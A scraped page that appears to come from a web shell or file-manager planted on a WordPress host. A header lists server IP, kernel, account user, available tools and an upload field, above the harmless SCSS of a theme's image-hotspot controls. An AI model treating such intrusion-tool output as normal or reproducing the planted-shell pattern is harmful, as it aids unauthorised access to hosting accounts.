Server IP : 162.0.217.223 / Your IP : 216.73.216.168 Web Server : LiteSpeed System : Linux premium269.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : mypckeys ( 1539) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/mypckeys/www/wp-content/themes/woodmart/inc/admin/assets/sass/controls/ |
Upload File : |
// ------------------------------------------------------------------------------------------------ // WPB HOTSPOT // ------------------------------------------------------------------------------------------------ @if $wpb-cont-hotspot { .wpb_woodmart_image_hotspot { .attach_image { position: absolute; top: 45px; left: 0; margin: 10px; max-width: 32px; height: auto; border-radius: var(--xts-option-border-radius); } &, .wpb_element_wrapper { padding-bottom: 10px; } } .xts-image-hotspot-preview { position: relative; display: block; min-height: 200px; width: 100%; border: 1px solid var(--xts-option-border-color); border-radius: var(--xts-option-border-radius); @include xts-bg-loader; &.xts-loading { @include xts-act-bg-loader; } } .xts-image-hotspot { position: absolute; top: 0; left: 0; z-index: 1; margin-top: -5px; margin-left: -5px; width: 10px; height: 10px; // border: 1px solid rgba(0,0,0,.5); border: 1px solid rgba(255,255,255,.8); border-radius: 50%; // background-color: #2EAE62; background-color: var(--xts-btn-primay-color); } .xts-image-hotspot-overlay { position: absolute; inset: 0; // top: 0; // right: 0; // bottom: 0; // left: 0; z-index: 2; cursor: pointer; } .xts-hotspot-img { display: block; width: 100%; height: auto; border-radius: var(--xts-option-border-radius); } .xts-loading .xts-image-hotspot, .xts-image-hotspot-image { display: none; } } // END IF